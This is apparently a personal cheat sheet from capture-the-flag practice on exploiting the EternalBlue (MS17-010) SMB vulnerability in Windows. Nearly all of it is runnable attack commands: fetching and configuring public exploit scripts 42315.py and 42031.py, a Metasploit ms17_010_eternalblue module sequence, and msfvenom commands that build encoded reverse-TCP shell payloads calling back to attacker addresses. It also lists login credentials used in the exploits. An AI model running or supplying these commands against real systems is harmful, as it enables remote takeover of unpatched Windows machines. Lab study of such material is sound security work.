Eternal Blue - Exploits

windows, foothold, smb, privesc

Double Pulsar #

42315.py #

# Get mysmb module
wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py

# Install dependencies
virtualenv -p py2 virtualenv_eternalblue
source virtualenv_eternalblue/bin/activate
pip install impacket
searchsploit -m 42315.py

# Optional - add username and password (use this if
# anonymous login doesn't work)
(virtualenv_eternalblue) ➜  relevant cat 42315.py| egrep '^(USER|PASS)'
USERNAME = 'Bob'
PASSWORD = '!P@$$W0rD!123'
(virtualenv_eternalblue) ➜  relevant 

# Run
python 42315.py 10.10.82.56

42031.py #

# Set up a virtualenv in the same way as for 42315.py
searchsploit -m 42031.py

# Update credentials
(virtualenv_eternalblue) ➜  relevant cat 42031.py | grep login_standard
	conn.login_standard('Bill', 'Juw4nnaM4n420696969!$$$')
(virtualenv_eternalblue) ➜  relevant

# Generate shell code file
msfvenom -p windows/shell/reverse_tcp LHOST=10.11.40.33 LPORT=4444 -e x86/shikata_ga_nai -f exe -o eternalblue.exe

# Run
python 42031.py 10.10.177.9 eternalblue.exe

# NOTE: This doesn't work on Windows Server 2016

Metasploit #

# If the victim is vulnerable to MS17-010 (EternalBlue),
# try using Metasploit. NOTE: if this fails the first
# time, try running it a couple more times.
msf> use windows/smb/ms17_010_eternalblue
msf> set rhosts 10.10.10.13
msf> set lhost tun0
msf> set payload windows/x64/shell/reverse_tcp
msf> run

# Try upgrading to a meterpreter shell

send_and_execute.py #

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.51 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
python send_and_execute.py legacy ms17-010.exe

Troubleshooting #

USERNAME = '\\'
PASSWORD = ''

References #